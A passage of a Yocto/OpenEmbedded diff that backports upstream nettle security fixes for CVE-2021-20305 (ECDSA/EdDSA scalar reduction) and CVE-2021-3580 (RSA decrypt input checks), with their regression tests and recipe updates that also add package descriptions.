+triggers an assert on 64-bit platforms, without above fix.
+* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+the same signature.
+
+(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
+CVE: CVE-2021-20305 dep3
+[Minor fixup on _nettle_secp_224r1]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ ecc-ecdsa-verify.c | 4 ++--
+ testsuite/ecdsa-sign-test.c | 13 +++++++++++++
+ testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
+ 4 files changed, 44 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 2a9217a6..63848f53 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,7 +1,15 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+#+ to compute the scalars used for ecc multiplication.
+#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+#+ triggers an assert on 64-bit platforms, without above fix.
+#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating
+#+ the same signature.
+#+
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/ecc-ecdsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
++++ nettle-3.5.1/ecc-ecdsa-verify.c
+@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
+
+ /* u1 = h / s, P1 = u1 * G */
+ ecc_hash (&ecc->q, hp, length, digest);
+- ecc_modq_mul (ecc, u1, hp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
+
+ /* u2 = r / s, P2 = u2 * Y */
+- ecc_modq_mul (ecc, u2, rp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
+
+ /* Total storage: 5*ecc->p.size + ecc->mul_itch */
+ ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
+Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
+@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Producing the signature for corresponding test in
++ ecdsa-verify-test.c, with special u1 and u2. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "99b5b787484def12894ca507058b3bf5"
++ "43d72d82fa7721d2e805e5e6",
++ "2",
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* Test cases for the smaller groups, verified with a
+ proof-of-concept implementation done for Yubico AB. */
+ test_ecdsa (&_nettle_secp_192r1,
+Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
+@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Corresponds to nonce k = 2 and private key z =
++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
++ hash are chosen so that intermediate scalars in the verify
++ equations are u1 = 0x6b245680e700, u2 =
++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical
++ reduction of the scalars. Bug caused by missing canonical
++ reduction reported by Guido Vranken. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "9e7e6cc6b1bdfa8ee039b66ad85e5490"
++ "7be706a900a3cba1c8fdd014", /* x */
++ "74855db3f7c1b4097ae095745fc915e3"
++ "8a79d2a1de28f282eafb22ba", /* y */
++
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* From RFC 4754 */
+ test_ecdsa (&_nettle_secp_256r1,
+ "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
+Backport of:
+
+From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:27:50 +0100
+Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
+
+* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+canonical range.
+
+(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
+CVE: CVE-2021-20305 dep4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ ecc-ecdsa-sign.c | 3 +--
+ 2 files changed, 4 insertions(+), 2 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 63848f53..fb2d7f66 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+#+ canonical range.
+#+
+# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+# * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+--- a/ecc-ecdsa-sign.c
++++ b/ecc-ecdsa-sign.c
+@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
+
+ ecc_modq_mul (ecc, tp, zp, rp);
+ ecc_modq_add (ecc, hp, hp, tp);
+- ecc_modq_mul (ecc, tp, hp, kinv);
++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
+
+- mpn_copyi (sp, tp, ecc->p.size);
+ #undef P
+ #undef hp
+ #undef kinv
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:42:21 +0100
+Subject: [PATCH] Similar fix for eddsa.
+
+* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+reduced. Two of the three call sites need that.
+
+(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
+
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
+CVE: CVE-2021-20305
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ eddsa-hash.c | 10 +++++++---
+ 2 files changed, 10 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5f8a22c2..ce330831 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+#+ reduced. Two of the three call sites need that.
+#+
+# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+#
+Index: nettle-3.5.1/eddsa-hash.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-hash.c
++++ nettle-3.5.1/eddsa-hash.c
+@@ -46,7 +46,12 @@ void
+ _eddsa_hash (const struct ecc_modulo *m,
+ mp_limb_t *rp, const uint8_t *digest)
+ {
++ mp_limb_t cy;
+ size_t nbytes = 1 + m->bit_size / 8;
+ mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
+ m->mod (m, rp);
++ mpn_copyi (rp + m->size, rp, m->size);
++ /* Ensure canonical reduction. */
++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, rp + m->size, m->size);
+ }
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
+From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:31:39 +0200
+Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
+
+Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
+
+(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 17 +++++++++-
+ rsa-decrypt-tr.c | 7 ++---
+ rsa-internal.h | 4 +--
+ rsa-sec-decrypt.c | 9 ++++--
+ rsa-sign-tr.c | 61 +++++++++++++++++-------------------
+ testsuite/rsa-encrypt-test.c | 14 ++++++++-
+ 6 files changed, 69 insertions(+), 43 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+ TMP_GMP_ALLOC (em, key->size);
++ mpz_limbs_copy(m, gibberish, key_limb_size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, key_limb_size);
+
+Index: nettle-3.5.1/rsa-internal.h
+===================================================================
+--- nettle-3.5.1.orig/rsa-internal.h
++++ nettle-3.5.1/rsa-internal.h
+@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
+ mp_limb_t *scratch);
+
+ /* Safe side-channel silent variant, using RSA blinding, and checking the
+- * result after CRT. */
++ * result after CRT. In-place calls, with x == m, is allowed. */
+ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn);
++ mp_limb_t *x, const mp_limb_t *m);
+
+ #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ /* We need a copy because m can be shorter than key_size,
++ * but _rsa_sec_compute_root_tr expect all inputs to be
++ * normalized to a key_size long buffer length */
++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
++
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
+
+Index: nettle-3.5.1/rsa-sign-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sign-tr.c
++++ nettle-3.5.1/rsa-sign-tr.c
+@@ -131,35 +131,34 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
++ mp_size_t nn;
+ mpz_t mz;
+ mpz_t xz;
+ int res;
+
+- mpz_init(mz);
+ mpz_init(xz);
+
+- mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
+- mpz_limbs_finish(mz, mn);
++ nn = mpz_size (pub->n);
+
+- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
++ mpz_roinit_n(mz, m, nn));
+
+ if (res)
+- mpz_limbs_copy(x, xz, mpz_size(pub->n));
++ mpz_limbs_copy(x, xz, nn);
+
+- mpz_clear(mz);
+ mpz_clear(xz);
+ return res;
+ }
+ #else
+ /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
+- returns the inverse (ri), for use by rsa_unblind. */
++ returns the inverse (ri), for use by rsa_unblind. Must have c != m,
++ no in-place operation.*/
+ static void
+ rsa_sec_blind (const struct rsa_public_key *pub,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
+- mp_size_t mn)
++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
+ {
+ const mp_limb_t *ep = mpz_limbs_read (pub->e);
+ const mp_limb_t *np = mpz_limbs_read (pub->n);
+@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
+
+ /* c = m*(r^e) mod n */
+ itch = mpn_sec_powm_itch(nn, ebn, nn);
+- i2 = mpn_sec_mul_itch(nn, mn);
++ i2 = mpn_sec_mul_itch(nn, nn);
+ itch = MAX(itch, i2);
+- i2 = mpn_sec_div_r_itch(nn + mn, nn);
++ i2 = mpn_sec_div_r_itch(2*nn, nn);
+ itch = MAX(itch, i2);
+ i2 = mpn_sec_invert_itch(nn);
+ itch = MAX(itch, i2);
+
+- TMP_GMP_ALLOC (tp, nn + mn + itch);
+- scratch = tp + nn + mn;
++ TMP_GMP_ALLOC (tp, 2*nn + itch);
++ scratch = tp + 2*nn;
+
+ /* ri = r^(-1) */
+ do
+@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
+ while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
+
+ mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
+- /* normally mn == nn, but m can be smaller in some cases */
+- mpn_sec_mul (tp, c, nn, m, mn, scratch);
+- mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
++ mpn_sec_mul (tp, c, nn, m, nn, scratch);
++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
+ mpn_copyi(c, tp, nn);
+
+ TMP_GMP_FREE (r);
+@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
+ TMP_GMP_FREE (tp);
+ }
+
+-/* m = c ri mod n */
++/* m = c ri mod n. Allows x == c. */
+ static void
+ rsa_sec_unblind (const struct rsa_public_key *pub,
+ mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
+@@ -299,7 +297,7 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
+ TMP_GMP_DECL (c, mp_limb_t);
+ TMP_GMP_DECL (ri, mp_limb_t);
+@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
+ size_t key_limb_size;
+ int ret;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
+ key is invalid and rejected by rsa_private_key_prepare. However,
+@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
+ }
+
+ assert(mpz_size(pub->n) == key_limb_size);
+- assert(mn <= key_limb_size);
+
+ TMP_GMP_ALLOC (c, key_limb_size);
+ TMP_GMP_ALLOC (ri, key_limb_size);
+ TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
+
+- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
++ rsa_sec_blind (pub, random_ctx, random, c, ri, m);
+
+- _rsa_sec_compute_root(key, c, x, scratch);
++ _rsa_sec_compute_root(key, x, c, scratch);
+
+- ret = rsa_sec_check_root(pub, c, x);
++ ret = rsa_sec_check_root(pub, x, c);
+
+- rsa_sec_unblind(pub, x, ri, c);
++ rsa_sec_unblind(pub, x, ri, x);
+
+ cnd_mpn_zero(1 - ret, x, key_limb_size);
+
+@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
+ mpz_t x, const mpz_t m)
+ {
+ TMP_GMP_DECL (l, mp_limb_t);
++ mp_size_t nn = mpz_size(pub->n);
+ int res;
+
+- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
+- TMP_GMP_ALLOC (l, l_size);
++ TMP_GMP_ALLOC (l, nn);
++ mpz_limbs_copy(l, m, nn);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
+- mpz_limbs_read(m), mpz_size(m));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
+ if (res) {
+- mp_limb_t *xp = mpz_limbs_write (x, l_size);
+- mpn_copyi (xp, l, l_size);
+- mpz_limbs_finish (x, l_size);
++ mp_limb_t *xp = mpz_limbs_write (x, nn);
++ mpn_copyi (xp, l, nn);
++ mpz_limbs_finish (x, nn);
+ }
+
+ TMP_GMP_FREE (l);
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,6 +19,7 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
++ mpz_t zero;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+@@ -101,6 +102,17 @@ test_main(void)
+ ASSERT(decrypted[decrypted_length] == after);
+ ASSERT(decrypted[0] == 'A');
+
++ /* Test zero input. */
++ mpz_init_set_ui (zero, 0);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, zero));
++ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+ mpz_add_ui (key.q, key.q, 2);
+@@ -112,6 +124,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
++ mpz_clear(zero);
+ free(decrypted);
+ }
+-
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
@@ -0,0 +1,163 @@
+From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:32:38 +0200
+Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
+
+(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ rsa-decrypt-tr.c | 4 ++++
+ rsa-decrypt.c | 10 ++++++++++
+ rsa-sec-decrypt.c | 4 ++++
+ rsa.h | 5 +++--
+ testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
+ 6 files changed, 62 insertions(+), 9 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+Index: nettle-3.5.1/rsa-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt.c
++++ nettle-3.5.1/rsa-decrypt.c
+@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
+ int res;
+
+ mpz_init(m);
++
++ /* First check that input is in range. Since we don't have the
++ public key available here, we need to reconstruct n. */
++ mpz_mul (m, key->p, key->q);
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
++ {
++ mpz_clear (m);
++ return 0;
++ }
++
+ rsa_compute_root(key, m, gibberish);
+
+ res = pkcs1_decrypt (key->size, m, length, message);
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_DECL (em, uint8_t);
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+Index: nettle-3.5.1/rsa.h
+===================================================================
+--- nettle-3.5.1.orig/rsa.h
++++ nettle-3.5.1/rsa.h
+@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
+ size_t length, uint8_t *message,
+ const mpz_t gibberish);
+
+-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
++/* Compute x, the e:th root of m. Calling it with x == m is allowed.
++ It is required that 0 <= m < n. */
+ void
+ rsa_compute_root(const struct rsa_private_key *key,
+ mpz_t x, const mpz_t m);
+
+ /* Safer variant, using RSA blinding, and checking the result after
+- CRT. */
++ CRT. It is required that 0 <= m < n. */
+ int
+ rsa_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,11 +19,12 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
+- mpz_t zero;
++ mpz_t bad_input;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+ mpz_init(gibberish);
++ mpz_init(bad_input);
+
+ knuth_lfib_init(&lfib, 17);
+
+@@ -103,15 +104,40 @@ test_main(void)
+ ASSERT(decrypted[0] == 'A');
+
+ /* Test zero input. */
+- mpz_init_set_ui (zero, 0);
++ mpz_set_ui (bad_input, 0);
+ decrypted_length = msg_length;
+- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_decrypt_tr(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- &decrypted_length, decrypted, zero));
++ &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_sec_decrypt(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- decrypted_length, decrypted, zero));
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is slightly larger than n */
++ mpz_add(bad_input, gibberish, pub.n);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is considerably larger than n */
++ mpz_mul_2exp (bad_input, pub.n, 100);
++ mpz_add (bad_input, bad_input, gibberish);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
+ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+@@ -124,6 +150,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
+- mpz_clear(zero);
++ mpz_clear(bad_input);
+ free(decrypted);
+ }
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index d92db0ef95..192fd295e9 100644
--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "A low level cryptographic library"
+DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
+DESCRIPTION = "It tries to solve a problem of providing a common set of \
+cryptographic algorithms for higher-level applications by implementing a \
+context-independent set of cryptographic algorithms"
SECTION = "libs"
LICENSE = "LGPLv3+ | GPLv2+"
@@ -14,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
file://Add-target-to-only-build-tests-not-run-them.patch \
file://run-ptest \
file://check-header-files-of-openssl-only-if-enable_.patch \
+ file://CVE-2021-3580_1.patch \
+ file://CVE-2021-3580_2.patch \
+ file://CVE-2021-20305-1.patch \
+ file://CVE-2021-20305-2.patch \
+ file://CVE-2021-20305-3.patch \
+ file://CVE-2021-20305-4.patch \
+ file://CVE-2021-20305-5.patch \
"
SRC_URI_append_class-target = "\
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
SUMMARY = "New GNU Portable Threads library"
+DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
HOMEPAGE = "https://www.gnu.org/software/pth/"
SECTION = "libs"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index 4ba93f998a..5f1b73ee16 100644
--- a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,18 +1,21 @@
SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
+DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
+HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
